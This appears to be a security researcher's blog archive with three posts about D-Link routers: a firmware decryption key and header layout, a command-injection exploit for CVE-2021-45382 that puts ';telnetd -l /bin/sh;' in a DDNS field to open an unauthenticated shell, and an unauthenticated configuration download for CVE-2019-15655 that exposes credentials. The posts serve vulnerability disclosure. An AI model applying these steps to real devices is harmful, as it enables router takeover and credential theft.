Posts

Showing posts from April, 2022

Decrypting D-Link Encrypted Firmware (SHRS)

Image
Introduction  D-Link firmware with SHRS magic bytes contain firmware encrypted using AES 128 CBC with key as 0xC05FBF1936C99429CE2A0781F08D6AD8. Original firmware can be obtained by extracting the encrypted block from the firmware and then decrypting using this key. Header Structure Header structure of firmware along with corresponding values for a sample firmware DIR-867_FW1.30B07.bin is given in table. Offset Size (Bytes) Item Value (DIR-867_FW1.30B07) 0 4 Magic Bytes SHRS 4 4 Decrypted FW Size 0x9D2AF9 8 4 Encrypted Block Size 0x9D2B00 0xC 16 IV 0x67C6697351FF4AEC29CDBAABF2FBE346 0x1C 64 SHA512(Decrypted FW + Key) 0x7139.......AA94 0x5C 64 SHA512(Decrypted FW) 0xDAC3.......5DA7 0x9C 64 SHA512(Encrypted Block) 0x7D3F.......12D2 0xDC 512 Unused 00 ...

CVE-2021-45382 D-Link Unauthenticated Remote Command Execution Vulnerability

Image
 Introduction A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions of D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via ddnshostname and ddnusername parameters in POST request to ddns_check.ccp. Exploit Open Firefox browser and enable web developer tools by going to Menu > More tools > Web Developer Tools . Select Network tab in Web Developer Tools window. Open management URL of the router. Eg. http://192.168.0.1 Select any request in the Web Developer Tools and click Resend > Edit and Resend option. Modify HTTP method to POST and URL to  /ddns_check.ccp Set the request data to  ccp_act=doCheck&ddnsHostName=;telnetd -l /bin/sh;&ddnsUsername=a&ddnsPassword=b Here the injected command " telnetd -l /bin/sh"  starts telnet service, which can be used to interact with router's OS without any authentication.  Command injection can be performed using  ddnsHostName or ddnsUsername parameter...

CVE-2019-15655 D-Link DSL-2875AL Unauthenticated Configuration Export

Image
 Introduction Configuration file of D-Link DSL-2875AL devices can be exported without authentication via a crafted HTTP request to the web server. This leads to configuration file export and disclosure of credentials stored in cleartext. Steps Download configuration file using URL: http://<ipaddress>/romfile.cfg Obtain the username and password from the   Account  tag in downloaded romfile.cfg XML file. Video